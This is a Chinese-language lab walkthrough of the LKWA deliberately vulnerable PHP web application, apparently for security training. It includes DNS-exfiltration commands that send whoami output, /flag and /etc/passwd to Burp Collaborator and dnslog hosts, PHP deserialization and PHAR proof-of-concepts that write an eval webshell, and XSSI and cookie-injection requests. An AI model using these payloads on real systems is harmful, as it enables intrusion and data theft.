LKWA靶机学习

1 下载地址

# 下载LKWA直接放在你的web服务器目录下即可运行

git clone https://github.com/weev3/LKWA

# docker安装

docker pull kminthein/lkwa:latest

docker run -ti -p 3000:80 kminthein/lkwa:latest

# 进入docker中安装ping工具

apt install iputils-ping

# 修改文件所属

chown -R www-data:www-data /var/www/html

  • 注意:

    • 对于XSSI实验,需要把apache2.conf中的Allow Override None改成Allow Override ALL。还可以将apache2.conf移动到/etc/apache2/

    • 对于PHAR Deserialization实验,需要把php.ini配置文件中的phar.readonly = On改成phar.readonly = Off

2 Blind RCE

由于盲打RCE不能回显数据,因此采用dns查询的方式把数据带出到dns服务器上。

2.1 利用Burpsuite Collaborato模块来查看输出。

  • 选择BP文件左上角Burp-->Burp Collaborator Client
  • 点击copy to clipboard复制payload,不要关闭当前窗口

  1. 在盲打RCE界面输入以下命令:

    ping `whoami`.r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net
    • 其中:r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net为复制的payload内容
    • 在Burp Collaborator Client界面查看回显的内容:www-data.r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net.

  2. 查看靶机系统根目录文件数量

    ls / | awk -F ' ' '{system("ping -c 2 "NR".r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net")}'
    • ping -c 2:是防止由于网络延时导致第一个ping包不可达,导致显示结果不正确
    • NR:已经读出的记录数,就是行号,从1开始
    • awk -F ' ' '{system("cmd")}':执行系统命令,以空格分隔
    • 在Burp Collaborator Client界面查看回显的内容:19.r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net. 说明当前根目录共有19个文件

  3. 查看靶机系统根目录文件名称

    ls / | awk -F' ' 'NR==1{system("ping -c 1 "$0".r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net")}'
    • 使用Burp遍历NR==$1$
    • 在Burp Collaborator Client界面查看回显的内容:bin.r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net.

  4. 查看flag文件内容:

    ping -c 1 `cat /flag`.r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net
    
ping -c 1 `head -1 /etc/passwd`.r4wjuu973k97ckrpp9i7tlge056wul.burpcollaborator.net

2.2 尝试利用dnslog进行回显

ping `whoami`.0bc423af.dns.1433.eu.org
  • 在DNS log界面查看回显的内容:www-data.0bc423af.dns.1433.eu.org.

3 XSSI

  1. 根据提示登录进去后,查看页面源码,发现存在../api/user

    <script>
    
     function get(){
    
     	$.ajax(
    
     	{
    
     	 url:"../api/user",
    
     	 type:"GET",
    
     	 async:true,
    
     	 success:function(parse){
    
     	  for (var i in parse){

     	      $("#" + i).text(parse[i]);

     	  }
    
     	 }
    
     	}
    
     	);
    
     }
    
     get();
    
</script>

  2. 补齐url,在当前登录的浏览器中访问http://192.168.50.4:3000/api/user

  3. 通过将构造好的1.php脚本放置在本地服务器目录下,以便随时拿数据

    <html>
    
  <head>
    
    <title>XSSI</title>
    
  </head>
    
<body>
    
    <script>
    
        function a(s)
    
        {
    
        alert(JSON.stringify(s));
    
        }
    
    </script>
    
    <script src="http://192.168.50.4:3000/api/user?callback=a"></script>
    
</body>
    
</html>

  4. 浏览器访问1.php脚本可拿到数据

4 Object Injection

单击提交按钮后,一些序列化数据将会添加到url中,根据该信息构造POC:

  1. 反序列化POC

    <?php
    
class Foo{
    
    function __construct($filename, $data) {
    
        $this->filename = $filename;
    
        $this->data = $data;
    
    }
    
    function __destruct(){
    
        file_put_contents($this->filename, $this->data);
    
    }
    
}

$a = new Foo("/var/www/html/test.php","<?php \${\${eval(\$_POST[acmd])}};phpinfo(); ?>");
    
echo serialize($a);
    
echo "\n";
    
echo urlencode(serialize($a));
    
echo "\n";
    
?>

  2. 生成如下内容:

    # php 1.php
    
O:3:"Foo":2:{s:8:"filename";s:22:"/var/www/html/test.php";s:4:"data";s:44:"<?php ${${eval($_POST[acmd])}};phpinfo(); ?>";}
    
O%3A3%3A%22Foo%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A22%3A%22%2Fvar%2Fwww%2Fhtml%2Ftest.php%22%3Bs%3A4%3A%22data%22%3Bs%3A44%3A%22%3C%3Fphp+%24%7B%24%7Beval%28%24_POST%5Bacmd%5D%29%7D%7D%3Bphpinfo%28%29%3B+%3F%3E%22%3B%7D

  3. 生成shell文件:

    http://192.168.50.4:3000/objectInjection/content.php?object=O%3A3%3A%22Foo%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A22%3A%22%2Fvar%2Fwww%2Fhtml%2Ftest.php%22%3Bs%3A4%3A%22data%22%3Bs%3A44%3A%22%3C%3Fphp+%24%7B%24%7Beval%28%24_POST%5Bacmd%5D%29%7D%7D%3Bphpinfo%28%29%3B+%3F%3E%22%3B%7D

  4. 查看上传的webshell文件

    # cat test.php
    
<?php ${${eval($_POST[acmd])}};phpinfo(); ?>

  5. 成功getshell:

5 Object Injection via cookies

与上一个实验原理一样,只是对象注入发生在cookie中。

  1. 反序列化POC

    <?php

/**
    
 * Object Injection via Cookie
    
 */
    
class Foo{
    
    public $cmd;
    
    function __construct() {
    
    }
    
    function __destruct(){
    
        eval($this->cmd);
    
    }
    
}

$a = new Foo();
    
$a->cmd = "phpinfo();";
    
echo serialize($a);
    
echo "\n";
    
echo urlencode(serialize($a));
    
echo "\n";
    
?>

  2. 生成如下POC:

    # php.exe 1.php | more
    
O:3:"Foo":1:{s:3:"cmd";s:10:"phpinfo();";}
    
O%3A3%3A%22Foo%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D

  3. 利用POC执行命令:

    POST /objectInjection_cookie/content.php HTTP/1.1
    
Host: 192.168.50.4:3000
    
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    
Accept-Encoding: gzip, deflate
    
Content-Type: application/x-www-form-urlencoded
    
Content-Length: 19
    
Origin: http://192.168.50.4:3000
    
Connection: close
    
Referer: http://192.168.50.4:3000/objectInjection_cookie/content.php
    
Cookie: PHPSESSID=scjeodjvci398so1j4j55htkp5; username=O%3A3%3A%22Foo%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D
    
Upgrade-Insecure-Requests: 1
    
DNT: 1
    
Sec-GPC: 1

username=&password=

  4. 成功执行phpinfo()命令

6 Object Injection (Object Reference)

让猜数据,但是不可能猜出来的。

原代码:

<?php

// vuln code

if (isset($_POST['guess'])) {

  // code...

  $obj = unserialize($_POST['input']);

  if($obj) {

      $obj->guess = $_POST['guess'];

      $obj->secretCode = rand(500000,999999);

      if($obj->guess === $obj->secretCode) {

          echo "<p class='text-success'>You Win !!!!!</p>";

      }

      else{

      	echo "<p class='text-danger'>Loser!!!!</p>";

      }

  }

}

?>
  • 将输入的数字与随机生成的密码进行比较。若输入的数字与该密码匹配,则表明通过,否则失败。
  • 猜是不可能猜的,只能绕过

  1. 反序列化POC

    <?php
    
class Object1
    
{
    
  var $guess;
    
  var $secretCode;
    
}

$a = new Object1();
    
$a->guess =  &$a->secretCode;

echo serialize($a);
    
echo "\n";
    
echo urlencode(serialize($a));
    
echo "\n";
    
?>

  2. 生成如下POC:

    # php 1.php
    
O:7:"Object1":2:{s:5:"guess";N;s:10:"secretCode";R:2;}
    
O%3A7%3A%22Object1%22%3A2%3A%7Bs%3A5%3A%22guess%22%3BN%3Bs%3A10%3A%22secretCode%22%3BR%3A2%3B%7D

  3. 利用POC绕过比较:

    POST /objectref/objectref.php HTTP/1.1
    
Host: 192.168.50.4:3000
    
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
    
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    
Accept-Encoding: gzip, deflate
    
Content-Type: application/x-www-form-urlencoded
    
Content-Length: 110
    
Origin: http://192.168.50.4:3000
    
Connection: close
    
Referer: http://192.168.50.4:3000/objectref/objectref.php
    
Cookie: PHPSESSID=scjeodjvci398so1j4j55htkp5; username=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3B%7D
    
Upgrade-Insecure-Requests: 1
    
DNT: 1
    
Sec-GPC: 1

guess=1&input=O%3A7%3A%22Object1%22%3A2%3A%7Bs%3A5%3A%22guess%22%3BN%3Bs%3A10%3A%22secretCode%22%3BR%3A2%3B%7D

  4. 成功绕过:

7 PHAR Deserialization

PHP phar:协议对象注入技术介绍 - FreeBuf网络安全行业门户

  1. PHAR POC:

    <?php
    
// create new Phar
    
@unlink("pharfile.phar");
    
$phar = new Phar('pharfile.phar');
    
$phar->startBuffering();
    
$phar->addFromString('test.txt', 'data');
    
$phar->setStub('<?php __HALT_COMPILER(); ? >');

// add object of any class as meta data
    
class log
    
{
    
    function __wakeup(){
    
    }
    
}
    
$object = new log;
    
$object->filename = 'test.php';
    
$object->data = '<?php ${${eval($_POST[acmd])}};phpinfo(); ?>';
    
$phar->setMetadata($object);
    
$phar->stopBuffering();
    
?>

  2. 生成如下POC:

    # php 1.php
    
会在当前目录下生成一个pharfile.phar文件

  3. 上传pharfile.phar,并执行以下Payload触发pharfile.phar文件执行

    http://192.168.50.4:3000/phar_deserial/phar_deserial.php?file=phar://uploads/pharfile.phar

  4. 靶机上查看上传的Payload与生成的webshell文件

    # ls -la /var/www/html/phar_deserial/uploads/pharfile.phar
    
-rw-r--r--. 1 www-data www-data 226 Jul 24 13:08 /var/www/html/phar_deserial/uploads/pharfile.phar

# cat /var/www/html/phar_deserial/test.php
    
<?php ${${eval($_POST[acmd])}};phpinfo(); ?>r

  5. 使用webshell客户端远程连接上传的webshell

8 SSRF

在输入框中输入一个图片的URL,将会在页面中显示出来:

代码部分:

<?php

include("sidebar.php");

if (isset($_GET['image'])) {

	# code...

	echo file_get_contents($_GET['image'], true);

}

?>

由代码可知,还可以包含本地文件:

9 Variables variable

在输入框中输入一些值,然后就会var_dump输出你输入的值。

  1. 代码部分:

    <?php
    
if (isset($_GET['func']) && isset($_GET['input'])) {
    
	$var = $_GET['func'];
    
	${"var"}($_GET['input']);
    
}
    
?>
    • 如果以GET方式传入funcinput的值,则将func的值添加到$var变量中,然后会将$var变量添加到动态变量中。在该动态变量可控时,可以把var_dump换成passthru

  2. 成功执行命令:

LKWA靶机学习的更多相关文章

  1. Vulnhub-XXE靶机学习

    ------------恢复内容开始------------ 前两天在微信公众号上看见了这个XXE靶场,就想试一试,虽然网上关于这个的文章已经写了太多太多了,但还是要写出来划划水,233333333, ...

  2. DC-2靶机

    DC-2 靶机获取:http://www.five86.com/ 靶机IP:192.168.43.197(arp-scan l) 攻击机器IP:192.168.43.199 在hosts文件里添加:1 ...

  3. 21. 从一道CTF靶机来学习mysql-udf提权

    这次测试的靶机为 Raven: 2 这里是CTF解题视频地址:https://www.youtube.com/watch?v=KbUUn3SDqaU 此次靶机主要学习 PHPMailer 跟 mymq ...

  4. Vulnhub DC-1靶机渗透学习

    前言 之前听说过这个叫Vulnhub DC-1的靶机,所以想拿来玩玩学习,结果整个过程都是看着别人的writeup走下来的,学艺不精,不过这个过程也认识到,学会了很多东西. 所以才想写点东西,记录一下 ...

  5. 脚本小子学习--vulnhub靶机DC8

    @ 目录 前言 一.环境搭建 二.目标和思路 三.实际操作 1.信息收集 2.getshell 总结 前言 通过一些靶机实战练习,学习使用现有的工具来成为脚本小子. 一.环境搭建 靶机:Linux虚拟 ...

  6. 《ODAY安全:软件漏洞分析技术》学习心得-----shellcode的一点小小的思考

    I will Make Impossible To I'm possible -----------LittleHann 看了2个多星期.终于把0DAY这本书给看完了,自己动手将书上的实验一个一个实现 ...

  7. Kali学习笔记31:目录遍历漏洞、文件包含漏洞

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 目录遍历漏洞: 应用程序如果有操作文件的功能,限制不严 ...

  8. Kali学习笔记30:身份认证与命令执行漏洞

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 实验环境: Kali机器:192.168.163.13 ...

  9. Kali学习笔记29:默认安装漏洞

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 默认安装漏洞: 早期Windows默认自动开启很多服务 ...

  10. Kali学习笔记26:OWASP_ZAP

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 OWASP_ZAP扫描器不同于之前介绍的Web扫描器: ...

随机推荐

  1. Fastjson漏洞+复现

    1.漏洞介绍 ​​FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性.通过查找代码中相关的方法,即可构造出一些恶意利用链. ...

  2. VRRP原理和实战

    一.VRRP基本概述 ·VRRP能够在不改变组网的情况中,将多台路由器虚拟成一个虚拟路由器,通过配置虚拟路由器的IP地址为默认网关,实现网关的备份. ·协议版本:VRRPv2(常用)和VRRPv3 · ...

  3. 时间片差分调度法-充分利用MCU的资源

    前言 通过该篇学习了嵌入式的任务调度(即时间片论法)后,了解到通过以1ms为调度时间单位轮询判断是否需要执行函数任务,那么下面介绍如何基于时间片论法的任务调度模式充分利用MCU的资源,姑且先称这种方式 ...

  4. 学习ASP.NET Core Blazor编程系列十七——文件上传(上)

    学习ASP.NET Core Blazor编程系列文章之目录 学习ASP.NET Core Blazor编程系列一--综述 学习ASP.NET Core Blazor编程系列二--第一个Blazor应 ...

  5. Jmeter ForEach 循环控制器

    ForEach Controller 即循环控制器,顾名思义是定义一种循环规则,如下图: 1.名称:控制器名称,可根据用户需要任意填写,也可不填 2.注释:用户可根据需要任意填写,也可不填 3.输入变 ...

  6. avue属性详解和使用介绍

    官方文档:https://www.avuejs.com/form/form.html <template> <!-- 基础组件 --> <basic-container& ...

  7. 自研ORM Include拆分查询(递归算法 支持无限层级) 性能优化探讨

    最近我在优化 Include 拆分查询,贴出源码供大家交流探讨是否还有优化空间. 测试代码 1 Console.WriteLine($"总记录数:{db.Query<Category& ...

  8. python之路36 MySQL查询关键字

    报错及作业讲解 报错 1.粗心大意 单词拼写错误 2.手忙脚乱 不会看报错 思考错误的核心 作业讲解 '''表与表中数据的关系可能会根据业务逻辑的不同 发生改变 不是永远固定的''' 服务器表与应用程 ...

  9. python进阶之路19 地狱之门购物车!!!!

    地狱之门 # # 项目功能 # 1.用户注册 # 2.用户登录 # 3.添加购物车 # 4.结算购物车 # # 项目说明 # 用户数据采用json格式存储到文件目录db下 一个用户一个单独的文件 # ...

  10. ORM执行SQL语句,神奇的双下划线查询,ORM外键字段的创建,外键字段数据的操作,多表查询

    ORM执行SQL语句,神奇的双下划线查询,ORM外键字段的创建,外键字段数据的操作,多表查询 一.ORM执行SQL语句 有时候ORM的操作效率较低,我们是可以自己来编写SQL语句的 方式一: res ...